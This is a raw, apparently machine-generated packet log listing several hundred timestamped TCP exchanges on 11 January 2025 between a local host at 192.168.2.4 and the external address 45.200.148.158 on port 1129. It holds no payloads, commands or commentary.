Jan 11, 2025 20:26:05.748296976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.748330116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.748344898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.748378038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.748409986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.748420954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.749188900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.749222040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.749233961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.749253035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.749284983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.749294043 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.749316931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.749357939 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.750004053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.750036001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.750067949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.750082016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.750099897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.750140905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.750859976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.750909090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.750941992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.750961065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.750973940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.751004934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.751018047 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.751627922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.751660109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.751678944 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.751691103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.751724005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.751737118 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.752497911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.752531052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.752562046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.752593994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.752594948 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.752616882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.752625942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.752677917 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.753271103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.753303051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.753335953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.753365993 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.753366947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.753400087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.753408909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.770858049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.770906925 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.771122932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.771155119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.771198988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.771435976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.771467924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.771501064 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.771509886 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.771910906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.771958113 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.830723047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.830780983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.830813885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.830831051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.831201077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.831233025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.831244946 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.831264973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.831300020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.831330061 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.831995964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.832027912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.832041025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.832061052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.832093000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.832101107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.832808018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.832839966 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.832851887 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.832873106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.832905054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.832916021 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.833664894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.833695889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.833710909 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.833728075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.833766937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.833777905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.833810091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.833852053 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.834450006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.834481955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.834515095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.834547043 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.834549904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.834594965 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.835289001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.835340977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.835372925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.835388899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.835406065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.835450888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.835520983 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.836149931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.836210012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.836229086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.836241961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.836273909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.836285114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.836935997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.836968899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.836987019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.837001085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.837033987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.837049961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.837064981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.837109089 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.837801933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.837835073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.837867022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.837883949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.837898970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.837950945 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.838489056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.838521004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.838551998 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.838567972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.838584900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.838615894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.838629007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.838649035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.838692904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.839303970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.839354992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.839386940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.839404106 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.839420080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.839452982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.839504957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.840152979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.840184927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.840200901 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.840217113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.840248108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.840261936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.840279102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.840312958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.840326071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.841002941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841037035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841048002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.841069937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841100931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841113091 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.841133118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841182947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.841864109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841897011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841928005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841941118 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.841962099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.841993093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.842008114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.842024088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.842067957 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.842665911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.842698097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.842729092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.842741013 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.842777014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.842809916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.842829943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.843466997 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.843499899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.843514919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.843532085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.843565941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.843575954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.843597889 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.843630075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.843651056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.844295979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.844327927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.844362974 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.844366074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.844399929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.844424963 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.844432116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.844465017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.844475031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.845746994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.845781088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.845803022 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.845812082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.845844984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.845860958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.845877886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.845916986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.846991062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.847040892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.847073078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.847084999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.847105026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.847136021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.847147942 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.847167969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.847198963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.847248077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.847249031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.847292900 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.861788034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.861932993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.861995935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.862025976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.862067938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.862098932 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.862112999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.862132072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.862179041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.862329006 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.862363100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.862410069 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.913501978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.914140940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.914175034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.914191961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.915730000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.915761948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.915780067 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.915796041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.915839911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.915879965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916078091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916110039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916135073 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.916141987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916173935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916193008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.916224003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916255951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916270018 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.916287899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916320086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916332006 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.916352034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916383028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916402102 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.916415930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916448116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916460991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.916481018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916512012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916522980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.916543961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916575909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916588068 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.916609049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916636944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.916652918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.917067051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.917098999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.917130947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.917130947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.917162895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.917175055 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.917236090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.917268038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.917275906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.918148994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.918183088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.918200016 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.918214083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.918246031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.918256998 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.918277979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.918309927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.918324947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.918342113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.918385029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.918939114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.918972015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.919003010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.919018030 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.919034958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.919065952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.919075966 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.919099092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.919142008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.920042992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.920075893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.920108080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.920120955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.920140028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.920176029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.920186043 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.920208931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.920239925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.920264006 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.921108961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921143055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921165943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.921175957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921206951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921236992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.921240091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921273947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921288967 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.921304941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921363115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.921724081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921756983 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921787024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921803951 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.921819925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921852112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921866894 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.921884060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921916008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.921927929 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.922629118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.922661066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.922686100 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.922691107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.922724009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.922734976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.922755957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.922789097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.922801971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.922821045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.922852993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.922872066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:05.923554897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.923588037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:05.923608065 CET	49730	1129	192.168.2.4	45.200.148.158
